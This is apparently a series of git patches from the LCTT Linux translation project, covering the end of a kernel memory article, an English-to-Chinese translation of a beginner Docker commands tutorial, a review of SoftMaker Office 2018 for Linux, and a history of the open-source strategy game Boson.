+When the program asks for more memory via the [brk()][26] system call, the kernel simply [updates][27] the heap VMA and calls it good. No page frames are actually allocated at this point and the new pages are not present in physical memory. Once the program tries to access the pages, the processor page faults and [do_page_fault()][28] is called. It [searches][29] for the VMA covering the faulted virtual address using [find_vma()][30]. If found, the permissions on the VMA are also checked against the attempted access (read or write). If there’s no suitable VMA, no contract covers the attempted memory access and the process is punished by Segmentation Fault.
+
+When a VMA is [found][31] the kernel must [handle][32] the fault by looking at the PTE contents and the type of VMA. In our case, the PTE shows the page is [not present][33]. In fact, our PTE is completely blank (all zeros), which in Linux means the virtual page has never been mapped. Since this is an anonymous VMA, we have a purely RAM affair that must be handled by [do_anonymous_page()][34], which allocates a page frame and makes a PTE to map the faulted virtual page onto the freshly allocated frame.
+
+Things could have been different. The PTE for a swapped out page, for example, has 0 in the Present flag but is not blank. Instead, it stores the swap location holding the page contents, which must be read from disk and loaded into a page frame by [do_swap_page()][35] in what is called a [major fault][36].
+
+This concludes the first half of our tour through the kernel’s user memory management. In the next post, we’ll throw files into the mix to build a complete picture of memory fundamentals, including consequences for performance.
+
+--------------------------------------------------------------------------------
+
+via: http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory/
+
+作者:[Gustavo Duarte][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://duartes.org/gustavo/blog/about/
+[1]:http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory
+[2]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1075
+[3]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1129
+[4]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L173
+[5]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L197
+[6]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L206
+[7]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L99
+[8]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm.h#L76
+[9]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L150
+[10]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L174
+[11]:http://en.wikipedia.org/wiki/Red_black_tree
+[12]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L175
+[13]:http://lxr.linux.no/linux+v2.6.28.1/fs/proc/task_mmu.c#L201
+[14]:http://www.nirsoft.net/kernel_struct/vista/EPROCESS.html
+[15]:http://www.nirsoft.net/kernel_struct/vista/MMVAD.html
+[16]:http://en.wikipedia.org/wiki/AVL_tree
+[17]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L185
+[18]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L173
+[19]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L230
+[20]:http://www.google.com/search?hl=en&q=2^20+*+2^12+bytes+in+GB
+[21]:http://en.wikipedia.org/wiki/Return-to-libc_attack
+[22]:http://duartes.org/gustavo/blog/post/getting-physical-with-memory
+[23]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm_types.h#L32
+[24]:http://lxr.linux.no/linux+v2.6.28/include/linux/page-flags.h#L14
+[25]:http://en.wikipedia.org/wiki/Buddy_memory_allocation
+[26]:http://www.kernel.org/doc/man-pages/online/pages/man2/brk.2.html
+[27]:http://lxr.linux.no/linux+v2.6.28.1/mm/mmap.c#L2050
+[28]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L583
+[29]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L692
+[30]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1466
+[31]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L711
+[32]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2653
+[33]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2674
+[34]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2681
+[35]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2280
+[36]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2316
From 9f073879f329be3b96325ff892281bb88a2a107a Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 18:45:42 +0800
Subject: [PATCH 195/371] translate done: 20170426 Important Docker commands
for Beginners.md
---
...Important Docker commands for Beginners.md | 178 ----------------
...Important Docker commands for Beginners.md | 190 ++++++++++++++++++
2 files changed, 190 insertions(+), 178 deletions(-)
delete mode 100644 sources/tech/20170426 Important Docker commands for Beginners.md
create mode 100644 translated/tech/20170426 Important Docker commands for Beginners.md
diff --git a/sources/tech/20170426 Important Docker commands for Beginners.md b/sources/tech/20170426 Important Docker commands for Beginners.md
deleted file mode 100644
index ad6acf1d12..0000000000
--- a/sources/tech/20170426 Important Docker commands for Beginners.md
+++ /dev/null
@@ -1,178 +0,0 @@
-translating by lujun9972
-Important Docker commands for Beginners
-======
-In our earlier tutorial, we learned to[ **install Docker on RHEL\ CentOS 7 & also created a docker container.**][1] In this tutorial, we will learn more commands to manipulate a docker container.
-
-### **Syntax for using Docker command**
-
- **$ docker [option] [command] [arguments]
-**
-
-To view the list of all available commands that can be used with docker, run
-
- **$ docker
-**
-
-& we will get the following list of commands as the output,
-
- **attach Attach to a running container
-build Build an image from a Dockerfile
-commit Create a new image from a container's changes
-cp Copy files/folders between a container and the local filesystem
-create Create a new container
-diff Inspect changes on a container's filesystem
-events Get real time events from the server
-exec Run a command in a running container
-export Export a container's filesystem as a tar archive
-history Show the history of an image
-images List images
-import Import the contents from a tarball to create a filesystem image
-info Display system-wide information
-inspect Return low-level information on a container or image
-kill Kill a running container
-load Load an image from a tar archive or STDIN
-login Log in to a Docker registry
-logout Log out from a Docker registry
-logs Fetch the logs of a container
-network Manage Docker networks
-pause Pause all processes within a container
-port List port mappings or a specific mapping for the CONTAINER
-ps List containers
-pull Pull an image or a repository from a registry
-push Push an image or a repository to a registry
-rename Rename a container
-restart Restart a container
-rm Remove one or more containers
-rmi Remove one or more images
-run Run a command in a new container
-save Save one or more images to a tar archive
-search Search the Docker Hub for images
-start Start one or more stopped containers
-stats Display a live stream of container(s) resource usage statistics
-stop Stop a running container
-tag Tag an image into a repository
-top Display the running processes of a container
-unpause Unpause all processes within a container
-update Update configuration of one or more containers
-version Show the Docker version information
-volume Manage Docker volumes
-wait Block until a container stops, then print its exit code
-**
-
-To further view the options available with a command, run
-
- **$ docker docker-subcommand info
-**
-
-& we will get a list of options that we can use with the docker-sub command.
-
-### **Testing connection with Docker Hub**
-
-By default, all the images that are used are pulled from Docker Hub. We can upload or download an image for OS from Docker Hub. To make sure that we can do so, run
-
- **$ docker run hello-world
-**
-
-& the output should be,
-
- **Hello from Docker.
-This message shows that your installation appears to be working correctly.
-…
-**
-
-This output message shows that we can access Docker Hub & can now download docker images from Docker Hub.
-
-### **Searching an Image**
-
-To search for an image for the container, run
-
- **$ docker search Ubuntu
-**
-
-& we should get list of available Ubuntu images. Remember if you are looking for an official image, look for [OK] under the official column.
-
-### **Downloading an image**
-
-Once we have searched and found the image we are looking for, we can download it by running,
-
- **$ docker pull Ubuntu
-**
-
-### **Viewing downloaded images**
-
-To view all the downloaded images, run
-
- **$ docker images
-**
-
-### **Running an container**
-
-To run a container using the downloaded image , we will use
-
- **$ docker run -it Ubuntu
-**
-
-Here, using '-it' will open a shell that can be used to interact with the container. Once the container is up & running, we can then use it as a normal machine & execute any commands that we require for our container.
-
-### **Displaying all docker containers**
-
-To view the list of all docker containers, run
-
- **$ docker ps
-**
-
-The output will contain list ofcontainers with container id.
-
-### **Stopping a docker container**
-
-To stop a docker container, run
-
- **$ docker stop container-id
-**
-
-### **Exit from the container**
-
-To exit from the container, type
-
- **$ exit
-**
-
-### **Saving the state of the container**
-
-Once the container is running & we have changed some settings in the container, like for example installed apache server, we need to save the state of the container. Image created is saved on the local system.
-
-To commit & save the state of the container, run
-
- **$ docker commit 85475ef774 repository/image_name
-**
-
-Here, **commit** will save the container state,
-
- **85475ef774** , is the container id of the container,
-
- **repository** , usually the docker hub username (or name of the repository added)
-
- **image_name** , will be the new name of the image.
-
-We can further add more information to the above command using '-m' & '-a'. With '-m', we can mention a message saying that apache server is installed & with '-a' we can add author name.
-
- **For example**
-
- **docker commit -m "apache server installed"-a "Dan Daniels" 85475ef774 daniels_dan/Cent_container
-**
-
-This completes our tutorial on important commands used in Dockers, please share your comments/queries in the comment box below.
-
-
---------------------------------------------------------------------------------
-
-via: http://linuxtechlab.com/important-docker-commands-beginners/
-
-作者:[Shusain][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linuxtechlab.com/author/shsuain/
-[1]:http://linuxtechlab.com/create-first-docker-container-beginners-guide/
diff --git a/translated/tech/20170426 Important Docker commands for Beginners.md b/translated/tech/20170426 Important Docker commands for Beginners.md
new file mode 100644
index 0000000000..3bd079de0c
--- /dev/null
+++ b/translated/tech/20170426 Important Docker commands for Beginners.md
@@ -0,0 +1,190 @@
+为小白准备的重要 Docker 命令说明
+======
+在早先的教程中,我们学习了[在 RHEL/CentOS 7 上安装 Docker 并创建 docker 容器][1]。在本教程中,我们会学习管理 docker 容器的其他命令。
+
+### Docker 命令语法
+
+```
+$ docker [option] [command] [arguments]
+```
+
+要列出 docker 支持的所有命令,运行
+
+```
+$ docker
+```
+
+我们会看到如下结果,
+
+```
+attach Attach to a running container
+build Build an image from a Dockerfile
+commit Create a new image from a container's changes
+cp Copy files/folders between a container and the local filesystem
+create Create a new container
+diff Inspect changes on a container's filesystem
+events Get real time events from the server
+exec Run a command in a running container
+export Export a container's filesystem as a tar archive
+history Show the history of an image
+images List images
+import Import the contents from a tarball to create a filesystem image
+info Display system-wide information
+inspect Return low-level information on a container or image
+kill Kill a running container
+load Load an image from a tar archive or STDIN
+login Log in to a Docker registry
+logout Log out from a Docker registry
+logs Fetch the logs of a container
+network Manage Docker networks
+pause Pause all processes within a container
+port List port mappings or a specific mapping for the CONTAINER
+ps List containers
+pull Pull an image or a repository from a registry
+push Push an image or a repository to a registry
+rename Rename a container
+restart Restart a container
+rm Remove one or more containers
+rmi Remove one or more images
+run Run a command in a new container
+save Save one or more images to a tar archive
+search Search the Docker Hub for images
+start Start one or more stopped containers
+stats Display a live stream of container(s) resource usage statistics
+stop Stop a running container
+tag Tag an image into a repository
+top Display the running processes of a container
+unpause Unpause all processes within a container
+update Update configuration of one or more containers
+version Show the Docker version information
+volume Manage Docker volumes
+wait Block until a container stops, then print its exit code
+```
+
+要进一步查看某个子命令支持的选项,运行
+
+```
+$ docker docker-subcommand info
+```
+
+就会列出 docker 子命令所支持的选项了。
+
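+举个例子(这是补充的示例,并非原文内容),要查看 `ps` 子命令支持的选项,也可以直接加上 `--help`:
+```
+$ docker ps --help
+```
+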
+### 测试与 Docker Hub 的连接
+
+默认,所有镜像都是从 Docker Hub 中拉取下来的。我们可以从 Docker Hub 上传或下载操作系统镜像。为了检查我们是否能够正常地通过 Docker Hub 上传/下载镜像,运行
+
+```
+$ docker run hello-world
+```
+
+结果应该是,
+
+```
+Hello from Docker.
+This message shows that your installation appears to be working correctly.
+…
+```
+
+输出结果表示你可以访问 Docker Hub 而且也能从 Docker Hub 下载 docker 镜像。
+
+### 搜索镜像
+
+要为容器搜索镜像,运行
+
+```
+$ docker search Ubuntu
+```
+
+我们应该会得到一个可用的 Ubuntu 镜像的列表。记住,如果你想要的是官方镜像,请检查 `OFFICIAL` 这一列是否为 `[OK]`。
+
+### 下载镜像
+
+一旦搜索并找到了我们想要的镜像,我们可以运行下面语句来下载它,
+
+```
+$ docker pull ubuntu
+```
+
+### 查看已下载的镜像
+
+要查看所有已下载的镜像,运行
+
+```
+$ docker images
+```
+
+### 运行容器
+
+要使用已下载的镜像来运行容器,可以使用下面的命令
+
+```
+$ docker run -it ubuntu
+```
+
+这里,使用 `-it` 选项会打开一个可以与容器交互的 shell。容器启动并运行后,我们就可以像使用普通机器那样使用它,在容器中执行任何我们需要的命令。
+
+### 显示所有的 docker 容器
+
+要列出所有 docker 容器,运行
+
+```
+$ docker ps
+```
+
+会输出一个容器列表,每个容器都有一个容器 id 标识。
+
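+补充一点(并非原文内容):`docker ps` 只会列出正在运行的容器,如果想把已停止的容器也一并列出,可以加上 `-a` 选项:
+```
+$ docker ps -a
+```
+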
+### 停止 docker 容器
+
+要停止 docker 容器,运行
+
+```
+$ docker stop container-id
+```
+
+### 从容器中退出
+
+要从容器中退出,执行
+
+```
+$ exit
+```
+
+### 保存容器状态
+
+容器运行起来并做了一些更改之后(比如安装了 apache 服务器),我们可以保存容器的状态,新创建的镜像会保存在本地系统上。
+
+运行下面语句来提交并保存容器状态
+
+```
+$ docker commit 85475ef774 repository/image_name
+```
+
+这里,**commit** 会保存容器状态
+
+ **85475ef774**,是容器的容器 id,
+
+ **repository**,通常为 docker hub 上的用户名 (或者新加的仓库名称)
+
+ **image_name**,新镜像的名称
+
+我们还可以使用 `-m` 和 `-a` 来添加更多信息。通过 `-m`,我们可以留个信息说 apache 服务器已经安装好了,而 `-a` 可以添加作者名称。
+
+ **像这样**
+
+```
+ docker commit -m "apache server installed" -a "Dan Daniels" 85475ef774 daniels_dan/Cent_container
+```
+
+我们的教程至此就结束了,本教程讲解了一下 Docker 中的那些重要的命令,如有疑问,欢迎留言。
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/important-docker-commands-beginners/
+
+作者:[Shusain][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/create-first-docker-container-beginners-guide/
From 2ff446faa2c7b42a53b28b6a0f625f07cf44683a Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 18:53:39 +0800
Subject: [PATCH 196/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20SoftMaker=20for?=
=?UTF-8?q?=20Linux=20Is=20a=20Solid=20Microsoft=20Office=20Alternative?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Is a Solid Microsoft Office Alternative.md | 138 ++++++++++++++++++
1 file changed, 138 insertions(+)
create mode 100644 sources/tech/20171227 SoftMaker for Linux Is a Solid Microsoft Office Alternative.md
diff --git a/sources/tech/20171227 SoftMaker for Linux Is a Solid Microsoft Office Alternative.md b/sources/tech/20171227 SoftMaker for Linux Is a Solid Microsoft Office Alternative.md
new file mode 100644
index 0000000000..6d00745e7d
--- /dev/null
+++ b/sources/tech/20171227 SoftMaker for Linux Is a Solid Microsoft Office Alternative.md
@@ -0,0 +1,138 @@
+SoftMaker for Linux Is a Solid Microsoft Office Alternative
+======
+![](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2017-softmaker-office-2018-1.jpg)
+
+
+[SoftMaker Office][6] could be a first-class professional-strength replacement for Microsoft Office on the Linux desktop.
+
+The Linux OS has its share of lightweight word processors and a few nearly worthy standalone spreadsheet apps, but very few high-end integrated office suites exist for Linux users. Generally, Linux office suites lack a really solid slide presentation creation tool.
+
+![PlanMaker Presentations][7]
+
+PlanMaker Presentations is a near-perfect Microsoft Powerpoint clone.
+
+Most Linux users opt for [LibreOffice][9] -- or maybe the withering [OpenOffice][10] -- or online subscriptions to Microsoft Office through Web browser apps.
+
+However, high-performing options for Linux office suites exist. The SoftMaker office suite product line is one such contender to replace Microsoft Office.
+
+The latest beta release of SoftMaker Office 2018 is fully compatible with Microsoft Office. It offers a completely redesigned user interface that allows users to work with either classic or ribbon menus.
+
+![SoftMaker UI Panel][11]
+
+On first use, you choose the user interface you prefer. You can change your default option at any time from the UI Panel in Settings.
+
+SoftMaker offers a complete line of free and paid office suite products that run on Android devices, Linux distros, and Windows or macOS PCs.
+
+![][12]
+
+### Rethinking Options
+
+The beta version of this commercial Linux office suite is free. When the final version is released, two Linux commercial versions will be available. The licenses for both let you run SoftMaker Office on five computers. It will be priced at US$69.95, or $99.95 if you want a few dictionary add-on tools included.
+
+Check out the free beta of the commercial version. A completely free open source-licensed version called "SoftMaker FreeOffice 2018," will be available soon. Switching is seamless. The FreeOffice line is distributed under the Mozilla Public License.
+
+The FreeOffice 2018 release will have the same ribbon interface option as SoftMaker Office 2018. The exact feature list is not finalized yet, according to Sales Manager Jordan Popov. Both the free and the paid versions will contain fully functional TextMaker, PlanMaker, and Presentations, just like the paid Linux SoftMaker Office 2018 release. The Linux edition has the Thunderbird email management client.
+
+When I reviewed SoftMaker FreeOffice 2016 and SoftMaker Office 2016, I found the paid and free versions to be almost identical in functionality and features. So opting for the free versus paid versions of the 2018 office suites might be a no-brainer.
+
+The value here is that the free open source and both commercial versions of the 2018 releases are true 64-bit products. Previous releases required some 32-bit dependencies to run on 64-bit architecture.
+
+### First Look Impressive
+
+The free version (FreeOffice 2018 for Linux) is not yet available for review. SoftMaker expects to release FreeOffice 2018 for Linux at the end of the first quarter of 2018.
+
+So I took the free beta release of Office 2018 for a spin to check out the performance of the ribbon user interface. Its performance was impressive.
+
+I regularly use the latest version of LibreOffice and earlier versions of FreeOffice. Their user interfaces mimic standard drop-down menus.
+
+It took me some time to get used to the ribbon menu, since I was unfamiliar with using it on Microsoft Office, but I came to like it.
+
+### How It Works
+
+The process is a bit different than scrolling down drop-down menus. You click on a category in the toolbar row at the top of the application window and then scan across the lateral display of boxed lists of functions.
+
+The lateral array of clickable menu choices changes with each toolbar category selected. Once I learned what was where, my appreciation for the "ribbon effect" grew.
+
+![TextMaker screen shot][13]
+
+The ribbon interface gives users a different look and feel when creating or editing documents on the Linux desktop.
+
+The labels are: File, Home, Insert, Layout, References, Mailings, Review and View. Click the action you want and instantly see it applied. There are no cascading menus.
+
+At first, I did not like not having any customizations available for things like often-used actions. Then I right-clicked on an item in the ribbon and discovered a pop-up menu.
+
+This provides a way to customize a Quick Action Bar, customize the ribbon display choices, and show the Quick Action toolbar as a separate toolbar. That prompted me to sit up straight and dig in with eyes wide open.
+
+### Great User Experience
+
+I process a significant number of graphics-heavy documents each week that are produced with Microsoft Office. I edit many of these documents and create many more.
+
+Much of my work goes to users of Microsoft Office. LibreOffice and SoftMaker Office applications have little to no trouble handling native Microsoft file formats such as DOCX, XLSX and PPTX.
+
+LibreOffice formatting -- both on screen and printed versions -- are well-done most times. SoftMaker's document renderings are even more exact.
+
+The beta release of SoftMaker Office 2018 for Linux is even better. Especially with SoftMaker Office 2018, I can exchange files directly with Microsoft Office users without conversion. This obviates the need to import or export documents.
+
+Given the nearly indistinguishable performance between previous paid and free versions of SoftMaker products, it seems safe to expect the same type of performance from FreeOffice 2018 when it arrives.
+
+### Expanding Office Reach
+
+SoftMaker Office products can give you complete cross-platform continuity for your office suite needs.
+
+Four Android editions are available:
+
+ * SoftMaker Office Mobile is the paid or commercial version for Android phones. You can find it in Google Play as TextMaker Mobile, PlanMaker Mobile and Presentations Mobile.
+ * SoftMaker FreeOffice Mobile is the free version for Android phones. You can find it in Google Play as the FREE OFFICE version of TextMaker Mobile, PlanMaker Mobile, Presentations Mobile.
+ * SoftMaker Office HD is the paid or commercial version for Android tablets. You can find it in Google Play as TextMaker HD, PlanMaker HD and Presentations HD.
+ * SoftMaker Office HD Basic is the free version for Android tablets. You can find it in Google Play as TextMaker HD Basic, PlanMaker HD Basic and Presentations HD Basic.
+
+
+
+Also available are TextMaker HD Trial, PlanMaker HD Trial and Presentations HD Trial in Google Play. These apps work only for 30 days but have all the features of the full version (Office HD).
+
+### Bottom Line
+
+The easy access to the free download of SoftMaker Office 2018 gives you nothing to lose in checking out its suitability as a Microsoft Office replacement. If you decide to upgrade to the paid Linux release, you will pay $69.95 for a proprietary license. That is the same price as the Home and Student editions of Microsoft Office 365.
+
+If you opt for the free open source version, FreeOffice 2018, when it is released, you still could have a top-of-the-line alternative to other Linux tools that play well with Microsoft Office.
+
+Download the [SoftMaker Office 2018 beta][15].
+
+### Want to Suggest a Review?
+
+Is there a Linux software application or distro you'd like to suggest for review? Something you love or would like to get to know? Please [email your ideas to me][16], and I'll consider them for a future Linux Picks and Pans column. And use the Reader Comments feature below to provide your input! ![][17]
+
+### About the Author
+
+![][18] **Jack M. Germain** has been an ECT News Network reporter since 2003. His main areas of focus are enterprise IT, Linux and open source technologies. He has written numerous reviews of Linux distros and other open source software. [Email Jack.][19]
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxinsider.com/story/SoftMaker-for-Linux-Is-a-Solid-Microsoft-Office-Alternative-85018.html
+
+作者:[Jack M. Germain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxinsider.com
+[1]:https://www.linuxinsider.com/images/2008/atab.gif
+[2]:https://www.linuxinsider.com/images/sda/all_ec_134x30.png
+[4]:https://www.linuxinsider.com/adsys/count/10019/?nm=1-allec-ci-lin-1&ENN_rnd=15154948085323&ign=0/ign.gif
+[5]:https://www.linuxinsider.com/images/article_images/linux5stars_580x24.jpg
+[6]:http://www.softmaker.com/en/softmaker-office-linux
+[7]:https://www.linuxinsider.com/article_images/2017/85018_620x358-small.jpg
+[8]:https://www.linuxinsider.com/article_images/2017/85018_990x572.jpg (::::topclose:true)
+[9]:http://www.libreoffice.org/
+[10]:http://www.openoffice.org/
+[11]:https://www.linuxinsider.com/article_images/2017/85018_620x439.jpg
+[12]:https://www.linuxinsider.com/adsys/count/10087/?nm=1i-lin_160-1&ENN_rnd=15154948084583&ign=0/ign.gif
+[13]:https://www.linuxinsider.com/article_images/2017/85018_620x264-small.jpg
+[14]:https://www.linuxinsider.com/article_images/2017/85018_990x421.jpg (::::topclose:true)
+[15]:http://www.softmaker.com/en/softmaker-office-linux-
+[16]:mailto:jack.germain@
+[17]:https://www.ectnews.com/images/end-enn.gif
+[18]:https://www.linuxinsider.com/images/rws572389/Jack%20M.%20Germain.jpg
+[19]:mailto:jack.germain@newsroom.ectnews.comm
From 01817adeac9ab0a0ebfe67883b530daeae792aac Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 19:02:09 +0800
Subject: [PATCH 197/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Forgotten=20FOSS?=
=?UTF-8?q?=20Games:=20Boson?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../20171229 Forgotten FOSS Games- Boson.md | 131 ++++++++++++++++++
1 file changed, 131 insertions(+)
create mode 100644 sources/tech/20171229 Forgotten FOSS Games- Boson.md
diff --git a/sources/tech/20171229 Forgotten FOSS Games- Boson.md b/sources/tech/20171229 Forgotten FOSS Games- Boson.md
new file mode 100644
index 0000000000..7cbbc231b5
--- /dev/null
+++ b/sources/tech/20171229 Forgotten FOSS Games- Boson.md
@@ -0,0 +1,131 @@
+Forgotten FOSS Games: Boson
+======
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/0.10-2-800x445.jpg)
+
+Back in September of 1999, just about a year after the KDE project had shipped its first release ever, Thomas Capricelli announced "our attempt to make a Real Time Strategy game (RTS) for the KDE project" on the [kde-announce][1] mailing list. Boson 0.1, as the attempt was called, was based on Qt 1.4, the KDE 1.x libraries, and described as being "Warcraft-like".
+
+Development continued at a fast pace over the following year. 3D artists and sound designers were invited to contribute, and basic game play (e.g. collecting oil and minerals) started working. The core engine gained much-needed features. A map editor was already part of the package. Four releases later, on October 30, 2000, the release of version 0.5 was celebrated as a major milestone, also because Boson had been ported to Qt 2.2.1 & KDE 2.0 to match the development of the projects it was based on. Then the project suddenly went into hiatus, as it happens so often with ambitious open source game projects. A new set of developers revived Boson one year later, in 2001, and decided to port the game to Qt 3, the KDE 3 libraries and the recently introduced libkdegames library.
+
+![][2]
+
+By version 0.6 (released in June of 2002) the project was on a very good path again, having been extended with all the features players were used to from similar RTS titles, e.g. fog of war, path-finding, units defending themselves automatically, the destruction of a radar/satellite station leading to the disappearance of the minimap, and so on. The game came with its own soundtrack (you had the choice between "Jungle" and "Progressive"), although the tracks did sound a bit… similar to each other, and Techno hadn't been a thing in game soundtracks since Command and Conquer: Tiberian Sun. More maps and sound effects tightened the atmosphere, but there was no computer opponent with artificial intelligence, so you absolutely had to play over a local network or online.
+
+Sadly the old websites at and are no longer online, and YouTube was not a thing back then, so most of the old artwork, videos and roadmaps are lost. But the [SourceForge page][3] has survived, and the [Subversion repository][4] contains screenshots from version 0.7 on and some older ones from unknown version numbers.
+
+### From 2D to 3D
+
+It might be hard to believe nowadays, but Boson was a 2D game until the release of version 0.7 in January of 2003. So it didn't look like Warcraft 3 (released in 2002), but much more like Warcraft 2 or the first five Command & Conquer titles. The engine was extended with OpenGL support and now "just" loaded the existing 3D models instead of forcing the developers to pre-render them into 2D sprites. Why so late? Because your average Linux installation simply didn't have OpenGL support when Boson was created back in 1999. The first XFree86 release to include GLX (OpenGL Extension to the X Window System) was version 4.0, published in 2000. And then it took a while to get OpenGL acceleration working in the major Linux graphics drivers (Matrox G200/G400, NVIDIA Riva TNT, ATI RagePro, S3 ViRGE and Intel 810). I can't say it was trivial to set up a Linux Desktop with hardware accelerated 3D until Ubuntu 7.04 put all the bits together for the first time and made it easy to install the proprietary NVIDIA drivers through the "Additional Drivers" settings dialogue.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/gl_boson1.jpg)
+
+So when Boson switched to OpenGL in January of 2003, that sucked. You now absolutely needed hardware acceleration to be able play it, and well, it was January of 2003. GPUs still used [AGP][5] slots back then, ATI was still an independent company, the Athlon64 would not be released before September 2003, and you were happy if you even owned a GeForce FX or a Radeon 9000 card. Luckily I did, and when I came across Boson, I immediately downloaded it, built it on my Gentoo machine and ran it on my three-monitor setup (two 15″ TFTs and one 21″ CRT). After debugging 3D hardware acceleration for a day or two, naturally…
+
+![][6]
+
+Boson wasn't finished or even really playable back then (still no computer opponent, only a few units working, no good maps etc.), but it showed promise, especially in light of the recent release of Command & Conquer: Generals in February of 2003. The thought of having an actual open source alternative to a recently released AAA video game title was so encouraging that I started to make small contributions, mainly by [reporting bugs][7]. The cursor icon theme I created using Cinema 4D never made it into a release.
+
+### Development hell
+
+Boson went through four releases in 2003 alone, all the way up to version 0.10. Performance was improved, the engine was extended with support for Python scripts, adaptive level of detail, smoke, lighting, day/night switches, and flying units. The 3D models started to look nice, an elementary Artificial Intelligence opponent was added (!), and the list of dependencies grew longer. Release notices like "Don't crash when using proprietary NVidia drivers and no usable font was found (reported to NVidia nearly a year ago)" are a kind reminder that proprietary graphics drivers already were a pain to work with back then, in case anybody forgot.
+
+![][8]
+
+An important task from version 0.10 on was to remove (or at least weaken) the dependencies on Qt and KDE. To be honest I never really got why the whole game, or for that matter any application ever, had to be based on Qt and KDE to begin with. Qt is a very, very intrusive thing. It's not just a library full of cool stuff, it's a framework. It locks you into its concept of what an application is and how it is supposed to work, and what your code should look like and how it is supposed to be structured. You need a whole toolchain with a metacompiler because your code isn't even standard C++.
+
+Every time the Qt/KDE developers decide to break the ABI, deprecate a component or come up with a new and (supposedly) better solution to an existing solution, you have to follow - and that has happened way too often. Just ask the KDE developers how many times they had to port KDE just because Qt decided to change everything for the umpteenth time, and now imagine you depend on both Qt **and** KDE. Pretty much everything Qt offers can be solved in a less intrusive way nowadays.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/buildings0001.png.wm-1024x576.jpg)
+
+Maybe the original Boson developers just wanted to take advantage of Qt's 2D graphics subsystem to make development easier. Or make sure the game could run on more than one platform (at least one release was known to work on FreeBSD). Or they hoped to become a part of the official KDE family to keep the project visible and attract more developers. Whatever the reason might have been, the cleanup was in full swing. aRts (the audio subsystem used by KDE 2 and 3) was replaced by the more standard OpenAL library. [libUFO][9] (which is one of the very few projects relying on the XUL language Mozilla uses to design UIs for Firefox and other applications, BTW) was used to draw the on-screen menus.
+
+The release of version 0.11 was delayed for 16 months due to the two main developers being busy with other stuff, but the changelog was very long and exciting. "Realistic" water and environmental objects like trees were added to the maps, the engine learned how to handle wind. The path-finding algorithm and the artificial intelligence opponent became smarter, and everything seemed to slowly come together.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/units0001.png.wm.jpg)
+
+By the time version 0.12 was released eight months later, Boson had working power plants, animated turrets, a new radar system and much more. Version 0.13, the last one to ever be officially released, again shipped an impressive amount of new features and improvements, but most of the changes were not really visible.
+
+Version 0.13 was released in October of 2006, and after December of the same year the commit rate suddenly dropped to zero. There were only two commits in the whole year of 2007, followed by an unsuccessful attempt to revive the project in 2008. In 2011 the "Help wanted" text was finally removed from the (broken) website and Boson was officially declared dead.
+
+### Let's Play Boson!
+
+The game no longer even builds on modern GNU/Linux distributions, mostly due to the unavailability of Qt 3 and the KDE 3 libraries and some other oddities. I managed to install Ubuntu 11.04 LTS in a VirtualBox, which was the last Ubuntu release to have Boson in its repositories. Don't be surprised by how bad the performance is, as far as I can tell it's not the fault of VirtualBox. Boson never ran fast on any kind of hardware and did everything in a single thread, probably losing a lot of performance when synchronizing with various subsystems.
+
